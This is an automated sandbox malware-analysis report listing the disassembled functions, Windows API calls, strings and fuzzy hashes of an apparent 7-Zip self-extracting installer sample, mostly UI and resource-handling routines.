Instruction Fuzzy Hash: DB314A76D01208BFDF115FE19D48EEF7F79EB48760F108066FA04B61A0C6794A60EB66

Function 004022D3 Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 120windowcommemoryCOMMON

Download Yara Rule

APIs

GetClassNameA.USER32(?,?,00000040), ref: 004022E5
lstrcmpiA.KERNEL32(?,STATIC), ref: 004022FC
GetWindowLongW.USER32(?,000000F0), ref: 0040230F
GetMenu.USER32(?), ref: 00402324

Part of subcall function 004020BF: GetModuleHandleW.KERNEL32(00000000), ref: 004020CA
Part of subcall function 004020BF: FindResourceExA.KERNEL32(00000000,?,?,00000000), ref: 004020E7
Part of subcall function 004020BF: FindResourceExA.KERNEL32(00000000,?,?,00000409), ref: 004020FB
Part of subcall function 004020BF: SizeofResource.KERNEL32(00000000,00000000), ref: 0040210C
Part of subcall function 004020BF: LoadResource.KERNEL32(00000000,00000000), ref: 00402116
Part of subcall function 004020BF: LockResource.KERNEL32(00000000), ref: 00402121

GlobalAlloc.KERNEL32(00000040,00000010), ref: 00402356
memcpy.MSVCRT(00000000,00000000,00000010), ref: 00402363
CoInitialize.OLE32(00000000), ref: 0040236C
CreateStreamOnHGlobal.OLE32(00000000,00000000,?), ref: 00402378
OleLoadPicture.OLEAUT32(?,00000000,00000000,0041C434,?), ref: 0040239D
GlobalFree.KERNEL32(00000000), ref: 004023AD

Part of subcall function 004021A8: GetWindowDC.USER32(00000000), ref: 004021B4
Part of subcall function 004021A8: GetDeviceCaps.GDI32(00000000,00000058), ref: 004021C0
Part of subcall function 004021A8: MulDiv.KERNEL32(00000000,00000064,00000060), ref: 004021D9
Part of subcall function 004021A8: GetObjectW.GDI32(?,00000018,?), ref: 00402208
Part of subcall function 004021A8: MulDiv.KERNEL32(?,00000003,00000002), ref: 00402213
Part of subcall function 004021A8: MulDiv.KERNEL32(?,00000003,00000002), ref: 0040221D
Part of subcall function 004021A8: CreateCompatibleDC.GDI32(?), ref: 0040222B
Part of subcall function 004021A8: CreateCompatibleDC.GDI32(?), ref: 00402232
Part of subcall function 004021A8: SelectObject.GDI32(00000000,?), ref: 00402240
Part of subcall function 004021A8: CreateCompatibleBitmap.GDI32(?,?,?), ref: 0040224E
Part of subcall function 004021A8: SelectObject.GDI32(00000000,00000000), ref: 00402256
Part of subcall function 004021A8: SetStretchBltMode.GDI32(00000000,00000004), ref: 0040225E
Part of subcall function 004021A8: StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00CC0020), ref: 0040227D
Part of subcall function 004021A8: GetCurrentObject.GDI32(00000000,00000007), ref: 00402286
Part of subcall function 004021A8: SelectObject.GDI32(00000000,?), ref: 00402293
Part of subcall function 004021A8: SelectObject.GDI32(00000000,?), ref: 00402299
Part of subcall function 004021A8: DeleteDC.GDI32(00000000), ref: 004022A2
Part of subcall function 004021A8: DeleteDC.GDI32(00000000), ref: 004022A5
Part of subcall function 004021A8: ReleaseDC.USER32(00000000,?), ref: 004022AC

GetObjectW.GDI32(00000000,00000018,?), ref: 004023DF
SetWindowPos.USER32(00000010,00000000,00000000,00000000,?,?,00000006), ref: 004023F3
SendMessageW.USER32(00000010,00000172,00000000,?), ref: 00402405
GlobalFree.KERNEL32(00000000), ref: 0040241A

Strings

IMAGES, xrefs: 0040232E
STATIC, xrefs: 004022F3

Memory Dump Source

Source File: 00000007.00000002.3473078211.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.3472996480.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3473535395.000000000041A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3473955510.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3474051802.0000000000423000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_b3712f1a7c.jbxd

Similarity

API ID: Object$Resource$CreateGlobalSelect$CompatibleWindow$DeleteFindFreeLoadStretch$AllocBitmapCapsClassCurrentDeviceHandleInitializeLockLongMenuMessageModeModuleNamePictureReleaseSendSizeofStreamlstrcmpimemcpy
String ID: IMAGES$STATIC
API String ID: 4202116410-1168396491
Opcode ID: 319126f5dc4d95ce062933b29b07fa50ef7377debf118cdda567db34e57cdb6f
Instruction ID: 12319829fe5b29bb351e3d23e86017266b1b8e93f03e65421de7465a1357d20e
Opcode Fuzzy Hash: 319126f5dc4d95ce062933b29b07fa50ef7377debf118cdda567db34e57cdb6f
Instruction Fuzzy Hash: 54419A31901218BFCB129FA1CC4CDEEBFB9FF09715B008076F905A62A0D7798A51DB69

Function 00407A58 Relevance: 24.3, APIs: 16, Instructions: 294COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000004B3), ref: 00407A80
GetWindowLongW.USER32(00000000,000000F0), ref: 00407A85
GetDlgItem.USER32(?,000004B4), ref: 00407ABC
GetWindowLongW.USER32(00000000,000000F0), ref: 00407AC1
GetSystemMetrics.USER32(00000010), ref: 00407B43
GetSystemMetrics.USER32(00000011), ref: 00407B49
GetSystemMetrics.USER32(00000008), ref: 00407B50
GetSystemMetrics.USER32(00000007), ref: 00407B57
GetParent.USER32(?), ref: 00407B7B
GetClientRect.USER32(00000000,?), ref: 00407B8D
ClientToScreen.USER32(?,?), ref: 00407BA0
SetWindowPos.USER32(?,00000000,?,?,?,00000000,00000004), ref: 00407C06
GetClientRect.USER32(?,?), ref: 00407CA0

Part of subcall function 00407A29: GetDlgItem.USER32(?,?), ref: 00407A47
Part of subcall function 00407A29: SetWindowPos.USER32(00000000), ref: 00407A4E

ClientToScreen.USER32(?,?), ref: 00407BA9

Part of subcall function 00407920: GetDlgItem.USER32(?,?), ref: 0040792C

GetSystemMetrics.USER32(00000008), ref: 00407D25
GetSystemMetrics.USER32(00000007), ref: 00407D2C

Memory Dump Source

Source File: 00000007.00000002.3473078211.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.3472996480.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3473535395.000000000041A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3473955510.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3474051802.0000000000423000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_b3712f1a7c.jbxd

Similarity

API ID: MetricsSystem$ClientItemWindow$LongRectScreen$Parent
String ID:
API String ID: 747815384-0
Opcode ID: 5ad90722fe14a1231b09212549862ba01d9118f977830e8c8324fbeb544dab44
Instruction ID: 68cc850d19f91a6f8b6e213b01393e3a0b6efc74fec8c50de4b66a5980513343
Opcode Fuzzy Hash: 5ad90722fe14a1231b09212549862ba01d9118f977830e8c8324fbeb544dab44
Instruction Fuzzy Hash: 30A13870E04209AFDB14DFBDCD85AAEBBF9EF48704F14452AE605F2281D678F9018B65

Function 004036F6 Relevance: 21.3, APIs: 10, Strings: 2, Instructions: 264COMMON

Download Yara Rule

APIs

??3@YAXPAX@Z.MSVCRT(?,00000000,00000000,0041E3F0,00000000), ref: 0040377F
??3@YAXPAX@Z.MSVCRT(?,?,00000000,00000000,0041E3F0,00000000), ref: 00403787
??3@YAXPAX@Z.MSVCRT(00404A6A,?), ref: 004039AD

Part of subcall function 00402990: ??3@YAXPAX@Z.MSVCRT(?,?,00405791,?,00405D01,?,?,?,?,00405D01,7zSfxVarModulePlatform,x86), ref: 00402996
Part of subcall function 00402990: ??3@YAXPAX@Z.MSVCRT(?,?,?,00405791,?,00405D01,?,?,?,?,00405D01,7zSfxVarModulePlatform,x86), ref: 0040299D

??3@YAXPAX@Z.MSVCRT(00404A6A,?,?,00000000,00000000,0041E3F0,00000000), ref: 004039DA

Strings

{\rtf, xrefs: 0040387A, 0040388F
SetEnvironment, xrefs: 00403909

Memory Dump Source

Source File: 00000007.00000002.3473078211.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.3472996480.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3473535395.000000000041A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3473955510.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3474051802.0000000000423000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_b3712f1a7c.jbxd

Similarity

API ID: ??3@
String ID: SetEnvironment${\rtf
API String ID: 613200358-318139784
Opcode ID: 9c91db27a8941fd50da050c674d3134fcc22a39ccbb8c0b40c6bb86ab884216b
Instruction ID: 401acfcb82d7e6738f93d8480f5cee0d093a2887585a601c22b507f4e5910529
Opcode Fuzzy Hash: 9c91db27a8941fd50da050c674d3134fcc22a39ccbb8c0b40c6bb86ab884216b
Instruction Fuzzy Hash: B991C372900108ABDF11AFD5D941AEEBBB8AF14309F2480BBE841772D2D7785B06DB59

Function 0041945F Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 111COMMON

Download Yara Rule

APIs

__set_app_type.MSVCRT ref: 0041948C
__p__fmode.MSVCRT ref: 004194A1
__p__commode.MSVCRT ref: 004194AF
__setusermatherr.MSVCRT ref: 004194DB
_initterm.MSVCRT ref: 004194F1
__getmainargs.MSVCRT ref: 00419514
_initterm.MSVCRT ref: 00419524
GetStartupInfoA.KERNEL32(?), ref: 00419563
GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 00419587
exit.MSVCRT ref: 00419597
_XcptFilter.MSVCRT ref: 004195A9

Strings

pA, xrefs: 0041950C, 0041950F

Memory Dump Source

Source File: 00000007.00000002.3473078211.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.3472996480.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3473535395.000000000041A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3473955510.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3474051802.0000000000423000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_b3712f1a7c.jbxd

Similarity

API ID: _initterm$FilterHandleInfoModuleStartupXcpt__getmainargs__p__commode__p__fmode__set_app_type__setusermatherrexit
String ID: pA
API String ID: 801014965-794713698
Opcode ID: cae9fb80b135284d651053ec5c4070e0fe44fc22ae79128d29673caf091d45a2
Instruction ID: 5929b0b6314edc43fbf3f3d2a0fc95e577a76ca797df3ab901b2fe2a182a5e0d
Opcode Fuzzy Hash: cae9fb80b135284d651053ec5c4070e0fe44fc22ae79128d29673caf091d45a2
Instruction Fuzzy Hash: 1141ADB2D41344BFDB22CFA5DC55AEABBB9FB09710F20012BE841A3291D7785D81CB59

Function 00407F86 Relevance: 16.6, APIs: 11, Instructions: 87windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 00407F94
GetWindowLongW.USER32(00000000), ref: 00407F9B
DefWindowProcW.USER32(?,?,?,?), ref: 00407FB1
CallWindowProcW.USER32(?,?,?,?,?), ref: 00407FCE
GetSystemMetrics.USER32(00000031), ref: 00407FE0
GetSystemMetrics.USER32(00000032), ref: 00407FE7
GetWindowDC.USER32(?), ref: 00407FF9
GetWindowRect.USER32(?,?), ref: 00408006
DrawIconEx.USER32(00000000,?,?,?,?,?,00000000,00000000,00000003), ref: 0040803A
ReleaseDC.USER32(?,00000000), ref: 00408042

Memory Dump Source

Source File: 00000007.00000002.3473078211.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.3472996480.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3473535395.000000000041A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3473955510.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3474051802.0000000000423000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_b3712f1a7c.jbxd

Similarity

API ID: Window$MetricsProcSystem$CallDrawIconLongParentRectRelease
String ID:
API String ID: 2586545124-0
Opcode ID: 02fb6cd533524937890b9fbe5e83660d242e66e068d65fd6c1c3ae9fb8eaf448
Instruction ID: 8ffa6a621c4839b38abe7fa2179ce9be6ee40ef55f84cce8d9fec75f1bbbc175
Opcode Fuzzy Hash: 02fb6cd533524937890b9fbe5e83660d242e66e068d65fd6c1c3ae9fb8eaf448
Instruction Fuzzy Hash: 8D214F7650021ABFCB019FB8DD48EEF3B69FB08351F004525FA11E2291CB35D920CB65

Function 00409466 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 73windowCOMMON

Download Yara Rule

APIs

Part of subcall function 004091A7: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004091EF
Part of subcall function 004091A7: SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00000103), ref: 0040920F
Part of subcall function 004091A7: GetDlgItem.USER32(?,000004B7), ref: 00409222
Part of subcall function 004091A7: SetWindowLongW.USER32(00000000,000000FC,Function_00007F86), ref: 00409230

Part of subcall function 0040793D: GetDlgItem.USER32(?,?), ref: 0040794A
Part of subcall function 0040793D: ShowWindow.USER32(00000000,?), ref: 00407961

Part of subcall function 00407920: GetDlgItem.USER32(?,?), ref: 0040792C

GetDlgItem.USER32(?,000004B6), ref: 004094A8
DestroyWindow.USER32(00000000), ref: 004094AB
CreateWindowExA.USER32(00000200,Edit,0041A840,500100A0,?,?,?,?,?,000004B6,00000000,00000000), ref: 004094E1
SendMessageW.USER32(?,00000031,00000000,00000000), ref: 004094F1
GetDlgItem.USER32(?,000004B6), ref: 004094FE
SendMessageW.USER32(00000000,00000030,?,00000001), ref: 00409508
GetDlgItem.USER32(?,000004B6), ref: 00409512
SetFocus.USER32(00000000), ref: 00409515

Strings

Edit, xrefs: 004094D7

Memory Dump Source

Source File: 00000007.00000002.3473078211.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.3472996480.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3473535395.000000000041A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3473955510.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3474051802.0000000000423000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_b3712f1a7c.jbxd

Similarity

API ID: Item$Window$MessageSend$CreateDestroyDirectoryFileFocusInfoLongShowSystem
String ID: Edit
API String ID: 2563414232-554135844
Opcode ID: 1c951395b049d258c5149e896e0566e3ea25c6708d6124f10a7b0945db6253a7
Instruction ID: 4d71b540c7600c41684bbba3335aa98688d5166c257b7e93b864b054f1ea387c
Opcode Fuzzy Hash: 1c951395b049d258c5149e896e0566e3ea25c6708d6124f10a7b0945db6253a7
Instruction Fuzzy Hash: DA116A71A00204BFEB11ABE5DD49FAFBBBCEF48B00F104429B201F61A1C675AD50876D

Function 00403E98 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 92COMMON

Download Yara Rule

APIs

??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,-00000001,;!@InstallEnd@!,;!@Install@!UTF-8!,?,00000000,00000000), ref: 00403EDF

Part of subcall function 00402D03: ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,00000000,;!@Install@!UTF-8!,?,00000000,00000000), ref: 00402D76

??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,-00000001,?,?,00000000,-00000001,;!@InstallEnd@!,;!@Install@!UTF-8!,?,00000000,00000000), ref: 00403F05
wsprintfA.USER32 ref: 00403F27
wsprintfA.USER32 ref: 00403F54

Strings

;!@Install@!UTF-8!, xrefs: 00403EA4
;!@InstallEnd@!, xrefs: 00403EB3
:Language:%u, xrefs: 00403F4E
:%hs, xrefs: 00403F21

Memory Dump Source

Source File: 00000007.00000002.3473078211.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.3472996480.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3473535395.000000000041A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3473955510.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3474051802.0000000000423000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_b3712f1a7c.jbxd

Similarity

API ID: ??3@$wsprintf
String ID: :%hs$:Language:%u$;!@Install@!UTF-8!$;!@InstallEnd@!
API String ID: 2704270482-695273242
Opcode ID: 33b53d402eec6e8f3b12914186b2c5884ffcd7aa6b788d70cfced2d98aefbe1a
Instruction ID: 886d926ed7ba0351d4e9ba57da7cb0629939e873fb03075975f52044c447bd08
Opcode Fuzzy Hash: 33b53d402eec6e8f3b12914186b2c5884ffcd7aa6b788d70cfced2d98aefbe1a
Instruction Fuzzy Hash: 15218F71A005187BDB05EAA59C86EFE73ADAB48704F14402EF504E31D1CB7DAA068799

Function 0040778B Relevance: 13.5, APIs: 9, Instructions: 47windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000004B3), ref: 0040779F
SendMessageW.USER32(00000000,000000F4,00000000,00000001), ref: 004077B2
GetDlgItem.USER32(?,000004B4), ref: 004077BC
SendMessageW.USER32(00000000,000000F4,00000000,00000001), ref: 004077C4
SendMessageW.USER32(?,00000401,00000000,00000000), ref: 004077D4
GetDlgItem.USER32(?,?), ref: 004077DD
SendMessageW.USER32(00000000,000000F4,00000001,00000001), ref: 004077E5
GetDlgItem.USER32(?,?), ref: 004077EE
SetFocus.USER32(00000000,?,?,00000000,00408726,000004B3,00000000,?,000004B3), ref: 004077F1

Memory Dump Source

Source File: 00000007.00000002.3473078211.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.3472996480.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3473535395.000000000041A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3473955510.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3474051802.0000000000423000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_b3712f1a7c.jbxd

Similarity

API ID: ItemMessageSend$Focus
String ID:
API String ID: 3946207451-0
Opcode ID: 68307c55e08eac57185263add51eb06e4822709b00eeca7ae34a923681d662df
Instruction ID: d34367ada3e0903658dac9af1ca1aef10e4e5856eabac84c2cebdb26553fe681
Opcode Fuzzy Hash: 68307c55e08eac57185263add51eb06e4822709b00eeca7ae34a923681d662df
Instruction Fuzzy Hash: A4F04F712403087BEA216B61DD86F9BBB5EDF80B54F018425F354661F0CBF7AC209A29

Function 00407E01 Relevance: 12.1, APIs: 8, Instructions: 69COMMON

Download Yara Rule

APIs

memcpy.MSVCRT(?,0041E470,00000160), ref: 00407E20
SystemParametersInfoW.USER32(00000029,00000000,?,00000000), ref: 00407E3F
GetDC.USER32(00000000), ref: 00407E4A
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00407E56
MulDiv.KERNEL32(?,00000048,00000000), ref: 00407E65
ReleaseDC.USER32(00000000,?), ref: 00407E73
GetModuleHandleW.KERNEL32(00000000), ref: 00407E9B
DialogBoxIndirectParamW.USER32(00000000,?,?,Function_00007643), ref: 00407ED0

Memory Dump Source

Source File: 00000007.00000002.3473078211.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.3472996480.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3473535395.000000000041A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3473955510.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3474051802.0000000000423000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_b3712f1a7c.jbxd

Similarity

API ID: CapsDeviceDialogHandleIndirectInfoModuleParamParametersReleaseSystemmemcpy
String ID:
API String ID: 2693764856-0
Opcode ID: 6fe21de5e6cf46c2e38258430ab068c08d1ba9f3266b2be4710a35066139e936
Instruction ID: 8154b001b0011d5121478cb58b91efa441906eea3886e432abe560883a3f5ac4
Opcode Fuzzy Hash: 6fe21de5e6cf46c2e38258430ab068c08d1ba9f3266b2be4710a35066139e936
Instruction Fuzzy Hash: 8421C375941318BFD7215BA1DD48EEB7B7CFF04301F0040B6FA09A2291D7744E948B6A

Function 0040796F Relevance: 12.1, APIs: 8, Instructions: 68COMMON

Download Yara Rule

APIs

GetDC.USER32(?), ref: 0040797F
GetSystemMetrics.USER32(0000000B), ref: 0040799B
GetSystemMetrics.USER32(0000003D), ref: 004079A4
GetSystemMetrics.USER32(0000003E), ref: 004079AC
SelectObject.GDI32(?,?), ref: 004079C9
DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 004079E4
SelectObject.GDI32(?,?), ref: 00407A0A
ReleaseDC.USER32(?,?), ref: 00407A19

Memory Dump Source

Source File: 00000007.00000002.3473078211.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.3472996480.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3473535395.000000000041A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3473955510.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3474051802.0000000000423000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_b3712f1a7c.jbxd

Similarity

API ID: MetricsSystem$ObjectSelect$DrawReleaseText
String ID:
API String ID: 2466489532-0
Opcode ID: 361b9f72db81968066b11de39633dd2aeb039f56a0627fc63b5b1369e6440dec
Instruction ID: 872bb3bd96abf1d963658246664a9f9dec04eac668a7313924c28ae5c7f0044f
Opcode Fuzzy Hash: 361b9f72db81968066b11de39633dd2aeb039f56a0627fc63b5b1369e6440dec
Instruction Fuzzy Hash: FF216871901209AFCB01CF69DD44A9EBFF4FF08360F10C46AE519A72A0D335AA50DF41

Function 00408921 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 102windowCOMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0040895B
GetDlgItem.USER32(?,000004B8), ref: 00408979
SendMessageW.USER32(00000000,00000402,00000000,00000000), ref: 0040898B
wsprintfW.USER32 ref: 004089A9
??3@YAXPAX@Z.MSVCRT(?), ref: 00408A41

Strings

%d%%, xrefs: 004089A3

Memory Dump Source

Source File: 00000007.00000002.3473078211.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.3472996480.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3473535395.000000000041A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3473955510.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3474051802.0000000000423000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_b3712f1a7c.jbxd

Similarity

API ID: ??3@ItemMessageSendUnothrow_t@std@@@__ehfuncinfo$??2@wsprintf
String ID: %d%%
API String ID: 3753976982-1518462796
Opcode ID: 51ae72c57df79fbb6cbb7e6395a09830993c207f45adbfda5b45f62387b44217
Instruction ID: dc12f65f6354bcef20b20b64e73197b6a82627a21fa16bd919092f53849079ab
Opcode Fuzzy Hash: 51ae72c57df79fbb6cbb7e6395a09830993c207f45adbfda5b45f62387b44217
Instruction Fuzzy Hash: C531B371500208BFCB11AF51DD45EEA7BB9FF48304F10802EF986B62E1DB79A910CB59

Function 00408B38 Relevance: 10.6, APIs: 7, Instructions: 63timethreadinjectionCOMMON

Download Yara Rule

APIs

EndDialog.USER32(?,00000000), ref: 00408B52
KillTimer.USER32(?,00000001), ref: 00408B63
SetTimer.USER32(?,00000001,00000000,00000000), ref: 00408B8D
SuspendThread.KERNEL32(00000298), ref: 00408BA6
ResumeThread.KERNEL32(00000298), ref: 00408BC3
EndDialog.USER32(?,00000000), ref: 00408BE5

Memory Dump Source

Source File: 00000007.00000002.3473078211.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.3472996480.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3473535395.000000000041A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3473955510.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3474051802.0000000000423000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_b3712f1a7c.jbxd

Similarity

API ID: DialogThreadTimer$KillResumeSuspend
String ID:
API String ID: 4151135813-0
Opcode ID: 636331c51eeec99492c3656744559ca8cb25bf13f1d29267e4cf69c729943fa4
Instruction ID: 672def9565bfc40134271a6b6781851c3b106654d45cfef20a52af227c3b9f34
Opcode Fuzzy Hash: 636331c51eeec99492c3656744559ca8cb25bf13f1d29267e4cf69c729943fa4
Instruction Fuzzy Hash: 101191B4202608EFE7215F52EE85EA7777CFB44745700843EF986A66A1CF396C10DA1D

Function 004041B2 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 56COMMON

Download Yara Rule

APIs

??3@YAXPAX@Z.MSVCRT(?,?,?,%%T\,0041A7E8,?,?,00000000,00404980,?,?,?,?,004068AF,00000000), ref: 004041F8
??3@YAXPAX@Z.MSVCRT(?,?,?,%%T/,0041A7D8,?,?,?,%%T\,0041A7E8,?,?,00000000,00404980,?,?), ref: 00404236
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,%%T/,0041A7D8,?,?,?,%%T\,0041A7E8,?,?,00000000), ref: 0040425C
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,%%T/,0041A7D8,?,?,?,%%T\,0041A7E8,?,?), ref: 00404264

Strings

%%T/, xrefs: 00404216
%%T\, xrefs: 004041D8

Memory Dump Source

Source File: 00000007.00000002.3473078211.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.3472996480.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3473535395.000000000041A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3473955510.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3474051802.0000000000423000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_b3712f1a7c.jbxd

Similarity

API ID: ??3@
String ID: %%T/$%%T\
API String ID: 613200358-2679640699
Opcode ID: 32ef79d1291380c273689fbeb54a3f068f011761e48dfc995dcc37c28d559008
Instruction ID: df8026740f1f86ca471eb2ea0e41fa98444a64685e80cf153ceacd7fb444c2e9
Opcode Fuzzy Hash: 32ef79d1291380c273689fbeb54a3f068f011761e48dfc995dcc37c28d559008
Instruction Fuzzy Hash: D411C97190010AAACF05FFA2D856CEDBB78AF14708F10846AB551760E2DF789B95CB48

Function 0040426D Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 56COMMON

Download Yara Rule

APIs

??3@YAXPAX@Z.MSVCRT(?,?,?,%%S\,0041A7E8,?,?,00000000,00404980,?,?,?,?,004068AF,00000000), ref: 004042B3
??3@YAXPAX@Z.MSVCRT(?,?,?,%%S/,0041A7D8,?,?,?,%%S\,0041A7E8,?,?,00000000,00404980,?,?), ref: 004042F1
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,%%S/,0041A7D8,?,?,?,%%S\,0041A7E8,?,?,00000000), ref: 00404317
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,%%S/,0041A7D8,?,?,?,%%S\,0041A7E8,?,?), ref: 0040431F

Strings

%%S/, xrefs: 004042D1
%%S\, xrefs: 00404293

Memory Dump Source

Source File: 00000007.00000002.3473078211.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.3472996480.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3473535395.000000000041A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3473955510.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3474051802.0000000000423000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_b3712f1a7c.jbxd

Similarity

API ID: ??3@
